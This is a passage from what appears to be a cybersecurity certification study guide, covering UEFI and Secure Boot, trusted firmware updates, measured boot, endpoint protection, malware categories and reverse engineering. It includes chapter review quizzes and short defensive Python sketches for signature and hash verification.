advanced interface than traditional BIOS. BIOS uses the master boot record (MBR) to store information about the hard drive data, while UEFI uses the GUID Partition Table (GPT). An MBR disk supports a maximum of four primary partitions, each limited to 2 terabytes (TB) in size, while UEFI allows up to 128 partitions, with a total disk limit of 9.4 zettabytes (ZB), or 9.4 billion terabytes.
UEFI is also faster and more secure than traditional BIOS. UEFI
Secure Boot requires boot loaders to have a digital signature.
UEFI is an open standard interface layer between the firmware
and the operating system that requires firmware updates to be
digitally signed. Security professionals should understand the
following points regarding UEFI:
Designed as a replacement for traditional PC BIOS.
Additional functionality includes support for Secure Boot, network
authentication, and universal graphics drivers.
Protects against BIOS malware attacks including rootkits.
Secure Boot requires that all boot loader components (e.g., OS kernel, drivers) attest to their identity with a digital signature, and that attestation is compared against a trusted list; a conceptual sketch of this check follows Figure 10-3. Secure/Measured Boot and attestation are covered further in the “Measured Boot and Attestation” section later in this chapter.
When a computer is manufactured, a list of keys that identify
trusted hardware, firmware, and operating system loader code (and
in some instances, known malware) is embedded in the UEFI.
Ensures the integrity and security of the firmware.
Prevents malicious files from being loaded.
Can be disabled for backward compatibility.
UEFI operates between the OS layer and the firmware layer, as
shown in Figure 10-3.
Figure 10-3 UEFI
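To illustrate the digital signature check at the heart of Secure Boot, here is a hedged sketch using the third-party Python cryptography package. Real verification happens in firmware against manufacturer-provisioned keys in the UEFI key database; the key generated here merely stands in for those trusted keys, and the boot loader bytes are a placeholder.

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

# Stand-in for the vendor's signing key (normally provisioned at manufacture)
vendor_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

boot_loader = b"placeholder boot loader image"
signature = vendor_key.sign(boot_loader, padding.PKCS1v15(), hashes.SHA256())

# Firmware-side check against the trusted public key
try:
    vendor_key.public_key().verify(
        signature, boot_loader, padding.PKCS1v15(), hashes.SHA256())
    print("Signature valid: load the boot loader")
except InvalidSignature:
    print("Untrusted boot loader: halt and trigger remediation")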
TRUSTED FOUNDRY
You must be concerned with the safety and the integrity of the
hardware that you purchase. The following are some of the
methods used to provide this assurance:
Trusted Foundry: The Trusted Foundry program can help you
exercise care in ensuring the authenticity and integrity of the
components of hardware purchased from a vendor. This U.S.
Department of Defense (DoD) program identifies “trusted vendors”
and ensures a “trusted supply chain.” A trusted supply chain begins
with trusted design and continues with trusted mask, foundry,
packaging/assembly, and test services. It ensures that systems have
access to leading-edge integrated circuits from secure, domestic
sources. At the time of this writing, 77 vendors have been certified
as trusted.
Source authenticity of hardware: When purchasing hardware
to support any network or security solution, a security professional
must ensure that the hardware’s authenticity can be verified. Just as
expensive consumer items such as purses and watches can be
counterfeited, so can network equipment. While the dangers with
counterfeit consumer items are typically confined to a lack of
authenticity and potentially lower quality, the dangers presented by
counterfeit network gear can extend to the presence of backdoors in
the software or firmware. Always purchase equipment directly from
the manufacturer when possible, and when purchasing from
resellers, use caution and insist on a certificate of authenticity. In
any case where the price seems too good to be true, keep in mind
that it may be an indication the gear is not authentic.
OEM documentation: One of the ways you can reduce the
likelihood of purchasing counterfeit equipment is to insist on the
inclusion of verifiable original equipment manufacturer (OEM)
documentation. In many cases, this paperwork includes anti-counterfeiting features. Make sure to use the vendor website to
verify all the various identifying numbers in the documentation.
SECURE PROCESSING
Secure processing is a concept that encompasses a variety of
technologies to prevent any insecure actions on the part of the
CPU or processor. In some cases these technologies involve
securing the actions of the processor itself, while other
approaches tackle the issue where the data is stored. This
section introduces some of these technologies and approaches.
Trusted Execution
Trusted Execution (TE) is a collection of features that is used
to verify the integrity of the system and implement security
policies, which together can be used to enhance the trust level of
the complete system. An example is the Intel Trusted Execution
Technology (Intel TXT). This approach is shown in Figure 10-4.
FIGURE 10-4 Intel Trusted Execution Technology
Secure Enclave
A secure enclave is a part of an operating system that cannot
be compromised even when the operating system kernel is
compromised, because the enclave has its own CPU and is
separated from the rest of the system. This means security
functions remain intact even when someone has gained control
of the OS. Secure enclaves are a relatively recent technology
being developed to provide additional security. Cisco, Microsoft,
and Apple all have implementations of secure enclaves that
differ in implementation but all share the same goal of creating
an area that cannot be compromised even when the OS is.
Processor Security Extensions
Processor security extensions are sets of security-related
instruction codes that are built into some modern CPUs. An
example is Intel Software Guard Extensions (Intel SGX). It
defines private regions of memory, called enclaves, whose
contents are protected and unable to be either read or saved by
any process outside the enclave itself, including processes
running at higher privilege levels.
Another processor security technique is the use of the NX and
XN bits. These bits are related to processors. Their respective
meanings are as follows:
NX (no-execute) bit: Technology used in CPUs to segregate areas
of memory for use by either storage of processor instructions (code)
or storage of data
XN (never execute) bit: Method for specifying areas of memory
that cannot be used for execution
When these bits are available in the architecture of the system,
they can be used to protect sensitive information from memory
attacks. By utilizing the capability of the NX bit to segregate
memory into areas where storage of processor instructions
(code) and storage of data are kept separate, many attacks can
be prevented. Also, the capability of the XN bit to mark certain
areas of memory that are off-limits to execution of code can
prevent other memory attacks as well.
Atomic Execution
In concurrent programming, atomic execution refers to program operations that run independently of any other process (thread). Making an operation atomic consists of using synchronization mechanisms to ensure that the operation is seen, from any other thread, as a single, indivisible operation.
increases security by preventing one thread from viewing the
state of the data when the first thread is still in the middle of the
operation. Atomicity also means that the operation of the thread
is either completely finished or is rolled back to its initial state
(there’s no such thing as partially done).
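The idea is easy to see in a short Python sketch. Without the lock, two threads could interleave the read-modify-write sequence and lose updates; with it, each deposit appears to every other thread as a single, indivisible operation.

import threading

balance = 0
lock = threading.Lock()

def deposit(amount):
    global balance
    # The lock makes the read-modify-write indivisible to other threads
    with lock:
        current = balance
        balance = current + amount

threads = [threading.Thread(target=deposit, args=(1,)) for _ in range(1000)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(balance)  # Always 1000 with the lock in place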
ANTI-TAMPER
Anti-tamper technology is designed to prevent access to
sensitive information and encryption keys on a device. Anti-tamper processors, for example, store and process private or
sensitive information, such as private keys or electronic money
credit. The chips are designed so that the information is not
accessible through external means and can be accessed only by
the embedded software, which should contain the appropriate
security measures, such as required authentication credentials.
Some of these chips take a different approach and zero out the
sensitive data if they detect penetration of their security, and
some can even do this with no power.
It also should not be possible for unauthorized persons to access
and change the configuration of any devices. This means
additional measures should be followed to prevent this.
Tampering includes defacing, damaging, or changing the
configuration of a device. Integrity verification programs should
be used by applications to look for evidence of data tampering,
errors, and omissions.
SELF-ENCRYPTING DRIVES
Self-encrypting drives do exactly as the name implies: they
encrypt themselves without any user intervention. The process
is so transparent to the user that the user may not even be
aware the encryption is occurring. Each drive uses a unique and random
data encryption key (DEK). When data is written to the drive, it
is encrypted, and when the data is read from the drive, it is
decrypted, as shown in Figure 10-5.
Figure 10-5 Self-encrypting drive
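The transparent encrypt-on-write, decrypt-on-read flow can be sketched in a few lines. This is conceptual only: it borrows the Fernet recipe from the third-party Python cryptography package to stand in for the drive controller’s hardware AES engine, and a real self-encrypting drive never exposes its DEK to software.

from cryptography.fernet import Fernet

dek = Fernet.generate_key()  # stands in for the drive's unique random DEK
cipher = Fernet(dek)

def write_sector(plaintext):
    # Data is encrypted transparently as it is written...
    return cipher.encrypt(plaintext)

def read_sector(ciphertext):
    # ...and decrypted transparently as it is read back
    return cipher.decrypt(ciphertext)

stored = write_sector(b"quarterly financials")
print(read_sector(stored))  # b'quarterly financials'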
TRUSTED FIRMWARE UPDATES
Hardware and firmware vulnerabilities are expected to become
an increasing target for sophisticated attackers. While typically
only successful when mounted by the skilled hands of a nation-state or advanced persistent threat (APT) group, an attack on
hardware and firmware can be devastating because this
firmware forms the platform for the entire device.
Firmware includes any type of instructions stored in non-volatile memory devices such as read-only memory (ROM), electrically erasable programmable read-only memory (EEPROM), or flash memory. BIOS and UEFI code are the most
common examples for firmware. Computer BIOS doesn’t go
bad; however, it can become out of date or contain bugs. In the
case of a bug, an upgrade will correct the problem. An upgrade
may also be indicated when the BIOS doesn’t support some
component that you would like to install, such as a larger hard
drive or a different type of processor.
Today’s BIOS is typically written to an EEPROM chip and can
be updated through the use of software. Each manufacturer has
its own method for accomplishing this. Check out the
manufacturer’s documentation for complete details. Regardless
of the exact procedure used, the update process is referred to as
flashing the BIOS. It means the old instructions are erased from
the EEPROM chip, and the new instructions are written to the
chip. Firmware can be updated by using an update utility from
the motherboard vendor. In many cases, the steps are as
follows.
Step 1. Download the update file to a flash drive.
Step 2. Insert the flash drive and reboot the machine.
Step 3. Use the specified key sequence to enter the
UEFI/BIOS setup.
Step 4. If necessary, disable Secure Boot.
Step 5. Save the changes and reboot again.
Step 6. Re-enter the CMOS settings.
Step 7. Choose the boot options and boot from the flash
drive.
Step 8. Follow the specific directions with the update to
locate the upgrade file on the flash drive.
Step 9. Execute the file (usually by typing flash).
Step 10. While the update is completing, ensure that you
maintain power to the device.
The key to trusted firmware updates is contained in Step 1. Only
obtain firmware updates from the vendor directly. Never use a
third-party facilitator for this. Also make sure you verify the
hash value that comes along with the update to ensure that it
has not been altered since its creation.
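Verifying the vendor’s hash takes only a few lines of Python. The file name and published digest below are hypothetical placeholders; substitute the values from the vendor’s download page.

import hashlib

def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        # Read in chunks so large firmware images don't exhaust memory
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

published = "0" * 64  # hypothetical digest copied from the vendor site
if sha256_of("firmware_update.bin") == published:
    print("Hash matches: safe to flash")
else:
    print("Hash mismatch: do not install this image")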
MEASURED BOOT AND ATTESTATION
Attestation is the process of ensuring, or attesting to the fact, that
a piece of software or firmware has integrity or that it has not
been altered from its original state. It is used in several boot
methods to check all elements used in the boot process to
ensure that malware has not altered the files or introduced new
files into the process. Let’s look at some of these Secure Boot
methods.
Measured Boot is closely associated with Secure Boot; both terms apply to several technologies that follow the Secure Boot standard. Implementations include Windows Secure Boot, measured launch, and Integrity Measurement Architecture (IMA). Figure 10-6 shows the three main actions related to Secure Boot in Windows, which are described in the following list:
1. The firmware verifies all UEFI executable files and the OS loader to
be sure they are trusted.
2. Windows boot components verify the signature on each component
to be loaded. Any untrusted components are not loaded and trigger
remediation.
3. The signatures on all boot-critical drivers are checked as part of
Secure Boot verification in Winload (Windows Boot Loader) and by
the Early Launch Anti-Malware driver.
Figure 10-6 Secure Boot
The disadvantage is that systems that ship with UEFI Secure Boot enabled refuse to load any operating system whose boot loader is not signed by a trusted key, which can prevent installing alternative operating systems or running live Linux media unless Secure Boot is disabled.
Measured Launch
A measured launch is a launch in which the software and
platform components have been identified, or “measured,”
using cryptographic techniques. The resulting values are used at
each boot to verify trust in those components. A measured
launch is designed to prevent attacks on these components
(system and BIOS code) or at least to identify when these
components have been compromised. It is part of Intel TXT.
TXT functionality is leveraged by software vendors including
HyTrust, PrivateCore, Citrix, and VMware.
An application of measured launch is Measured Boot by
Microsoft in Windows 10 and Windows Server 2019. It creates a detailed log of all components that loaded before the anti-malware software. This log can be used both to identify malware on the computer and to maintain evidence of boot component tampering.
One possible disadvantage of measured launch is potential
slowing of the boot process.
Integrity Measurement Architecture
Another approach that attempts to create and measure the
runtime environment is an open source trusted computing
component called Integrity Measurement Architecture (IMA),
mentioned earlier in this chapter. IMA creates a list of
components and anchors the list to the TPM chip. It can use the
list to attest to the system’s runtime integrity.
BUS ENCRYPTION
The CPU is connected to an address bus. Memory and I/O
devices recognize this address bus. These devices can then
communicate with the CPU, read requested data, and send it to
the data bus. Bus encryption protects the data traversing
these buses. Bus encryption is used by newer Microsoft
operating systems to protect certificates, BIOS, passwords, and
program authenticity. Bus encryption is necessary not only to prevent tampering with encrypted instructions that might otherwise be easily discovered on a data bus or during data transmission, but also to prevent discovery of decrypted instructions that may reveal security weaknesses an intruder can exploit.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 10-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 10-2 Key Topics in Chapter 10

Key Topic Element | Description | Page Number
Bulleted list | Hardware RoTs | 298
Bulleted list | TPM contents | 300
Figure 10-1 | vTPM possible solution 1 | 301
Figure 10-2 | vTPM possible solution 2 | 301
Bulleted list | Functions of an HSM | 302
Bulleted list | Drawbacks to an HSM | 302
Section | Security features of eFuse | 303
Figure 10-3 | UEFI operations | 304
Bulleted list | Methods used to provide hardware assurance | 305
Bulleted list | NX and XN bits | 307
Step list | Steps to updating firmware | 309
Figure 10-6 | Secure Boot | 310
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
Roots of Trust (RoTs)
Trusted Platform Module (TPM)
virtual TPM (vTPM)
hardware security module (HSM)
microSD HSM
eFuse
Unified Extensible Firmware Interface (UEFI)
Secure Boot
attestation
Trusted Foundry
secure processing
Trusted Execution
secure enclave
processor security extensions
atomic execution
anti-tamper technology
self-encrypting drives
Measured Boot
bus encryption
REVIEW QUESTIONS
1. RoTs need to be exposed by the operating system to
applications through an open ___________.
2. List at least one of the contents of a TPM chip.
3. Match the following terms with their definitions.

Terms | Definitions
Virtual TPM | An appliance that safeguards and manages digital keys used with strong authentication and provides crypto processing
HSM | Allows for the dynamic real-time reprogramming of computer chips
eFuse | A more advanced interface than traditional BIOS
UEFI | A software object that performs the functions of a TPM chip
4. _______________ requires that all boot loader
components (e.g., OS kernel, drivers) attest to their identity
(digital signature) and the attestation is compared to the
trusted list.
5. List the Intel example of the implementation of processor
security extensions.
6. Match the following terms with their definitions.

Terms | Definitions
Firmware | Using synchronization mechanisms to make sure that the operation is seen, from any other thread, as a single operation
Atomic execution | Any type of instructions stored in non-volatile memory devices such as read-only memory (ROM)
Measured Boot | Used by newer Microsoft operating systems to protect certificates, BIOS, passwords, and program authenticity
Bus encryption | Process where the firmware verifies all UEFI executable files and the OS loader to be sure they are trusted
7. _____________ creates a list of components and anchors
the list to the TPM chip. It can use the list to attest to the
system’s runtime integrity.
8. What is the disadvantage of systems that ship with UEFI
Secure Boot enabled?
9. Match the following terms with their definitions.

Terms | Definitions
NX bit | Used to encrypt self-encrypting drives
Random data encryption key (DEK) | Method for specifying areas of memory that cannot be used for execution
XN bit | A collection of features that is used to verify the integrity of the system and implement security policies, which together can be used to enhance the trust level of the complete system
Trusted Execution (TE) | Technology used in CPUs to segregate areas of memory for use by either storage of processor instructions (code) or storage of data
10. The traditional BIOS has been replaced with the
____________________.
Chapter 11
Analyzing Data as Part of
Security Monitoring
Activities
This chapter covers the following topics related to Objective 3.1
(Given a scenario, analyze data as part of security monitoring
activities) of the CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification exam:
Heuristics: Discusses how the heuristics process works.
Trend analysis: Covers the use of trend data.
Endpoint: Topics include malware, memory, system and
application behavior, file system, and user and entity behavior
analytics (UEBA).
Network: Covers URL and DNS analysis, flow analysis, and packet
and protocol analysis.
Log review: Includes event logs, Syslog, firewall logs, web
application firewall (WAF), proxy, and intrusion detection system
(IDS)/intrusion prevention system (IPS).
Impact analysis: Compares organization impact vs. localized
impact and immediate vs. total impact.
Security information and event management (SIEM)
review: Discusses rule writing, known-bad Internet Protocol (IP),
and the dashboard.
Query writing: Explains string search, scripting, and piping.
E-mail analysis: Examines malicious payload, DomainKeys
Identified Mail (DKIM), Domain-based Message Authentication,
Reporting, and Conformance (DMARC), Sender Policy Framework
(SPF), phishing, forwarding, digital signature, e-mail signature
block, embedded links, impersonation, and header.
Security monitoring activities generate a significant (maybe
even overwhelming) amount of data. Identifying what is
relevant and what is not requires that you not only understand
the various data formats that you encounter, but also recognize
data types and activities that indicate malicious activity. This
chapter explores the data analysis process.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these nine self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 11-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 11-1 “Do I Know This Already?” Foundation Topics Section-to-Question Mapping

Foundation Topics Section | Question
Heuristics | 1
Trend Analysis | 2
Endpoint | 3
Network | 4
Log Review | 5
Impact Analysis | 6
Security Information and Event Management (SIEM) Review | 7
Query Writing | 8
E-mail Analysis | 9
1. Which of the following determines the susceptibility of a
system to a particular threat or risk using decision rules or
weighing methods?
1. Heuristics
2. Trend analysis
3. SPF
4. Regression analysis
2. Which of the following is not an example of utilizing trend
analysis?
1. An increase in the use of a SQL server, indicating the need to
increase resources on the server
2. The identification of threats based on behavior that typically
accompanies such threats
3. A cessation in traffic bound for a server providing legacy services,
indicating a need to decommission the server
4. An increase in password resets, indicating a need to revise the
password policy
3. Which of the following discusses implementing endpoint
protection platforms (EPPs)?
1. IEC 270017
2. FIPS 120
3. NIST SP 800-128
4. PCI DSS
4. Which of the following is a free online service for testing and
analyzing URLs, helping with identification of malicious
content on websites?
1. URLVoid
2. URLSec
3. SOA
4. urlQuery
5. Which of the following is a protocol that can be used to
collect logs from devices and store them in a central
location?
1. Syslog
2. DNSSec
3. URLQuery
4. SMTP
6. When you are determining what role the quality of the
response played in the severity of the issue, what type of
analysis are you performing?
1. Trend analysis
2. Impact analysis
3. Log analysis
4. Reverse engineering
7. Which type of SIEM rule is typically used in worm/malware
outbreak scenarios?
1. Cause and effect
2. Trending
3. Transitive or tracking
4. Single event
8. Which of the following is used to look within a log file or
data stream and locate any instances of a combination of
characters?
1. Script
2. Pipe
3. Transitive search
4. String search
9. Which of the following enables you to verify the source of an
e-mail by providing a method for validating a domain name
identity that is associated with a message through
cryptographic authentication?
1. DKIM
2. DNSSec
3. IPsec
4. AES
FOUNDATION TOPICS
HEURISTICS
When analyzing security data, sometimes it is difficult to see the
forest for the trees. Using scripts, algorithms, and other
processes to assist in looking for the information that really
matters makes the job much easier and ultimately more
successful.
Heuristics is a type of analysis that determines the
susceptibility of a system to a particular threat/risk by using
decision rules or weighing methods. Decision rules are preset to
allow the system to make decisions, and weighing rules are used
within the decision rules to enable the system to make value
judgments among options. Heuristics is often utilized by
antivirus software to identify threats that signature analysis
can’t discover because the threats either are too new to have
been analyzed (called zero-day threats) or are multipronged
attacks that are constructed in such a way that existing
signatures do not identify them.
Many IDS/IPS solutions also can use heuristics to identify
threats.
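As a simple illustration of decision rules combined with weighing methods, the following Python sketch scores a sample against a few indicators and flags it when the weighted total crosses a threshold. The indicators, weights, and threshold are all invented for the example.

# Hypothetical weighted indicators of suspicious behavior
WEIGHTS = {
    "writes_to_system_dir": 4,
    "disables_security_tools": 5,
    "many_outbound_connections": 3,
    "packed_executable": 2,
}
THRESHOLD = 6  # decision rule: flag anything scoring 6 or higher

def heuristic_score(observed):
    return sum(WEIGHTS[i] for i in observed if i in WEIGHTS)

sample = ["packed_executable", "disables_security_tools"]
score = heuristic_score(sample)
print("suspicious" if score >= THRESHOLD else "probably benign", score)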
TREND ANALYSIS
In many cases, the sheer amount of security data that is
generated by the various devices located throughout our
environments makes it difficult to see what is going on. When
this same raw data is presented to us in some sort of visual
format, it becomes somewhat easier to discern patterns and
trends. Aggregating the data and graphing it makes spotting a
trend much easier.
Trend analysis focuses on the long-term direction in the
increase or decrease in a particular type of traffic or in a
particular behavior in the network. Some examples include the
following:
An increase in the use of a SQL server, indicating the need to
increase resources on the server
A cessation in traffic bound for a server providing legacy services,
indicating a need to decommission the server
An increase in password resets, indicating a need to revise the
password policy
Many vulnerability scanning tools include a preconfigured filter
for scan results that both organizes vulnerabilities found by
severity and charts the trend (up or down) for each severity
level.
For example, suppose you were interested in getting a handle on
the relative breakdown of security events between your
Windows devices and your Linux devices. Most tools that
handle this sort of thing can not only aggregate all events of a
certain type but graph them over time. Figure 11-1 shows
examples of such graphs.
Figure 11-1 Trend Analysis
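The aggregation step behind such graphs is straightforward. The following sketch counts hypothetical events per day and per platform; the resulting tallies can be fed to any charting tool to reveal the trend.

from collections import Counter

# Hypothetical (date, platform) security event records
events = [
    ("2020-06-01", "windows"), ("2020-06-01", "linux"),
    ("2020-06-02", "windows"), ("2020-06-02", "windows"),
    ("2020-06-03", "windows"), ("2020-06-03", "linux"),
]

per_day = Counter(day for day, _ in events)
per_platform = Counter(platform for _, platform in events)

for day in sorted(per_day):
    print(day, per_day[day])   # graph these counts over time
print(per_platform)            # Counter({'windows': 4, 'linux': 2})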
ENDPOINT
Many of the dangers to our environments come through the
endpoints. Endpoint security is a field of security that attempts
to protect individual endpoints in a network by staying in
constant contact with these individual endpoints from a central
location. It typically works on a client/server model in that each
endpoint has software that communicates with the software on
the central server. The functionality provided can vary.
In its simplest form, endpoint security includes monitoring and
automatic updating and configuration of security patches and
personal firewall settings. In more advanced systems, endpoint
security might include examination of the system each time it
connects to the network. This examination would ensure that all
security patches are up to date. In even more advanced
scenarios, endpoint security could automatically provide
remediation to the computer by installing missing security
patches. In either case, the computer would not be allowed to
connect to the network until the problem is resolved, either
manually or automatically. Other measures include using device
or drive encryption, enabling remote management capabilities
(such as remote wipe and remote locate), and implementing
device ownership policies and agreements so that the
organization can manage or seize the device.
Endpoint security can mitigate issues such as the following:
Malware of all types
Data exfiltration
NIST SP 800-128 discusses implementing endpoint
protection platforms (EPPs). According to NIST SP 800-128,
endpoints (that is, laptops, desktops, mobile devices) are a
fundamental part of any organizational system. Endpoints are
an important source of connecting end users to networks and
systems, and are also a major source of vulnerabilities and a
frequent target of attackers looking to penetrate a network. User
behavior is difficult to control and hard to predict, and user
actions, whether clicking on a link that executes malware or
changing a security setting to improve the usability of the
endpoint, frequently allow exploitation of vulnerabilities.
Commercial vendors offer a variety of products to improve
security at the endpoints of a network. These EPPs include the
following:
Anti-malware: Anti-malware applications are part of the common
secure configurations for system components. Anti-malware
software employs a wide range of signatures and detection schemes,
automatically updates signatures, disallows modification by users,
runs scans on a frequently scheduled basis, has an auto-protect
feature set to scan automatically when a user action is performed
(for example, opening or copying a file), and may provide
protection from zero-day attacks. For platforms for which antimalware software is not available, other forms of anti-malware such
as rootkit detectors may be employed.
Personal firewalls: Personal firewalls provide a wide range of
protection for host machines including restriction on ports and
services, control against malicious programs executing on the host,
control of removable devices such as USB devices, and auditing and
logging capability.
Host-based intrusion detection and prevention system
(IDPS): Host-based IDPS is an application that monitors the
characteristics of a single host and the events occurring within that
host to identify and stop suspicious activity. This is distinguished
from a network-based IDPS, which is an intrusion detection and
prevention system that monitors network traffic for particular
network segments or devices and analyzes the network and
application protocol activity to identify and stop suspicious activity.
Restrict the use of mobile code: Organizations should exercise
caution in allowing the use of mobile code such as ActiveX, Java,
and JavaScript. An attacker can easily attach a script to a URL in a
web page or e-mail that, when clicked, executes malicious code
within the computer’s browser.
Security professionals may also want to read NIST SP 800-111,
which provides guidance to storage encryption technologies for
end-user devices. In addition, NIST provides checklists for
implementing different operating systems according to the U.S.
Government Configuration Baseline (USGCB).
Malware
Malicious software (or malware) is any software that harms a
computer, deletes data, or takes actions the user did not
authorize. It includes a wide array of malware types, including
ones you have probably heard of such as viruses, and many you
might not have heard of, but of which you should be aware. The
malware that you need to understand includes the following:
Virus
Boot sector virus
Parasitic virus
Stealth virus
Polymorphic virus
Macro virus
Multipartite virus
Worm
Trojan horse
Logic bomb
Spyware/adware
Botnet
Rootkit
Ransomware
Virus
A virus is a self-replicating program that infects software. It
uses a host application to reproduce and deliver its payload and
typically attaches itself to a file. It differs from a worm in that it
usually requires some action on the part of the user to help it
spread to other computers. The following list briefly describes
various virus types:
Boot sector: This type of virus infects the boot sector of a
computer and either overwrites files or installs code into the sector
so that the virus initiates at startup.
Parasitic: This type of virus attaches itself to a file, usually an
executable file, and then delivers the payload when the program is
used.
Stealth: This type of virus hides the modifications that it is making
to the system to help avoid detection.
Polymorphic: This type of virus makes copies of itself, and then
makes changes to those copies. It does this in hopes of avoiding
detection from antivirus software.
Macro: This type of virus infects programs written in Word Basic, Visual Basic, or VBScript that are used to automate functions.
Macro viruses infect Microsoft Office files and are easy to create
because the underlying language is simple and intuitive to apply.
They are especially dangerous in that they infect the operating
system itself. They also can be transported between different
operating systems because the languages are platform independent.
Multipartite: Originally, these viruses could infect both program
files and boot sectors. This term now means that the virus can infect
more than one type of object or can infect in more than one way.
File or system infector: File infectors infect program files, and
system infectors infect system program files.
Companion: This type of virus does not physically touch the target
file. It is also referred to as a spawn virus.
E-mail: This type of virus specifically uses an e-mail system to
spread itself because it is aware of the e-mail system functions.
Knowledge of the functions allows this type of virus to take
advantage of all e-mail system capabilities.
Script: This type of virus is a stand-alone file that can be executed
by an interpreter.
Worm
A worm is a type of malware that can spread without the
assistance of the user. It is a small program that, like a virus, is
used to deliver a payload. One way to help mitigate the effects of
worms is to place limits on sharing, writing, and executing
programs.
Trojan Horse
A Trojan horse is a program or rogue application that appears
to or is purported to do one thing but actually does another
when executed. For example, what appears to be a screensaver
program might really be a Trojan horse. When the user
unwittingly uses the program, it executes its payload, which
could be to delete files or create backdoors. Backdoors are
alternative ways to access the computer undetected in the
future.
One type of Trojan targets and attempts to access and make use
of smart cards. A countermeasure to prevent this attack is to use
“single-access device driver” architecture. Using this approach,
the operating system allows only one application to have access
to the serial device (and thus the smart card) at any given time.
Another way to prevent the attack is by using a smart card that
enforces a “one private key usage per PIN entry” policy model.
In this model, the user must enter her PIN every single time the
private key is used, and therefore the Trojan horse would not
have access to the key.
Logic Bomb
A logic bomb is a type of malware that executes when a
particular event takes place. For example, that event could be a
time of day or a specific date or it could be the first time you
open notepad.exe. Some logic bombs execute when forensics are
being undertaken, and in that case the bomb might delete all
digital evidence.
Spyware/Adware
Adware doesn’t actually steal anything, but it tracks your
Internet usage in an attempt to tailor ads and junk e-mail to
your interests. Spyware also tracks your activities and can also
gather personal information that could lead to identity theft. In
some cases, spyware can even direct the computer to install
software and change settings.
Botnet
A bot is a type of malware that installs itself on large numbers of
computers through infected e-mails, downloads from websites,
Trojan horses, and shared media. After it’s installed, the bot has
the ability to connect back to the hacker’s computer. After that,
the hacker’s server controls all the bots located on these
machines. At a set time, the hacker might direct the bots to take
some action, such as direct all the machines to send out spam
messages, mount a DoS attack, or perform phishing or any
number of malicious acts. The collection of computers that act
together is called a botnet, and the individual computers are
called zombies. The attacker that manages the botnet is often
referred to as the botmaster. Figure 11-2 shows this
relationship.
FIGURE 11-2 Botnet
Rootkit
A rootkit is a set of tools that a hacker can use on a computer
after he has managed to gain access and elevate his privileges to
administrator. It gets its name from the root account, the most
powerful account in Unix-based operating systems. The rootkit
tools might include a backdoor for the hacker to access. This is
one of the hardest types of malware to remove, and in many
cases only a reformat of the hard drive will completely remove
it. The following are some of the actions a rootkit can take:
Install a backdoor
Remove all entries from the security log (log scrubbing)
Replace default tools with compromised versions (Trojaned
programs)
Make malicious kernel changes
Ransomware
Ransomware is malware that prevents or limits users from
accessing their systems. It is called ransomware because it
forces its victims to pay a ransom through certain online
payment methods to be given access to their systems again or to
get their data back.
Reverse Engineering
Reverse engineering is a term that has been around for
some time. Generically, it means taking something apart to
discover how it works and perhaps to replicate it. In
cybersecurity, it is used to analyze both hardware and software
and for various other reasons, such as to do the following:
Discover how malware functions
Determine whether malware is present in software
Locate software bugs
Locate security problems in hardware
The following sections look at the role of reverse engineering in
cybersecurity analysis.
Isolation/Sandboxing
When conducting reverse engineering, how can you analyze
malware without suffering the effects of the malware? The
answer is to place the malware where you can safely probe and
analyze it. This is done by isolating, or sandboxing, the
malware. This process is covered more fully in the “Sandboxing”
section of Chapter 12, “Implementing Configuration Changes to
Existing Controls to Improve Security.”
Software/Malware
Software of any type can be checked for integrity to ensure that
it has not been altered since its release. Checking for integrity is
one of the ways you can tell when a file has been corrupted (or
perhaps replaced entirely) with malware. Two main methods
are used in this process:
Fingerprinting/hashing: Fingerprinting, or hashing, is the
process of using a hashing algorithm to reduce a large document or
file to a character string that can be used to verify the integrity of
the file (that is, whether the file has changed in any way). To be
useful, a hash value must have been computed at a time when the
software or file was known to have integrity (for example, at release
time). At any time thereafter, the software file can be checked for
integrity by calculating a new hash value and comparing it to the
value from the initial calculation. If the character strings do not
match, a change has been made to the software.
Fingerprinting/hashing has been used for some time to verify the
integrity of software downloads from vendors. The vendor provides
the hash value and specifies the hash algorithm, and the customer
recalculates the hash value after the download. If the result matches
the value from the vendor, the customer knows the software has
integrity and is safe.
Anti-malware products also use this process to identify malware.
The problem is that malware creators know this, and so they are
constantly making small changes to malicious code to enable the
code to escape detection through the use of hashes or signatures.
When they make a small change, anti-malware products can no longer identify the malware until the anti-malware vendor creates a new hash or signature. For this reason, some vendors are beginning to use “fuzzy” hashing, which looks for hash values that are similar but not exact matches; the short sketch following this list shows why even a tiny change defeats exact matching.
Decomposition: Decomposition is the process of breaking
something down to discover how it works. When applied to
software, it is the process of discovering how the software works,
perhaps who created it, and, in some cases, how to prevent the
software from performing malicious activity.
When used to assess malware, decomposition can be done two
ways: statically and dynamically. When static or manual analysis is
used, it takes hours per file and uses tools called disassemblers.
Advanced expertise is required. Time is often wasted on repetitive
sample unpacking and indicator extraction tasks.
With dynamic analysis tools, an automated static analysis engine is
used to identify, de-archive, de-obfuscate, and unpack the
underlying object structure. Then proactive threat indicators (PTIs)
are extracted from the unpacked files. A rules engine classifies the
results to calculate the threat level and to route the extracted files
for further analysis. Finally, the extracted files are repaired to
enable further extraction or analysis with a sandbox, decompiler, or
debugger. While the end result may be the same, these tools are
much faster and require less skill than manual or static analysis.
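The avalanche behavior that defeats exact-match hashing is easy to demonstrate. The two byte strings below are hypothetical stand-ins for an original malware sample and a slightly modified variant.

import hashlib

original = b"malicious payload v1"
tweaked = b"malicious payload v2"  # attacker changes a single byte

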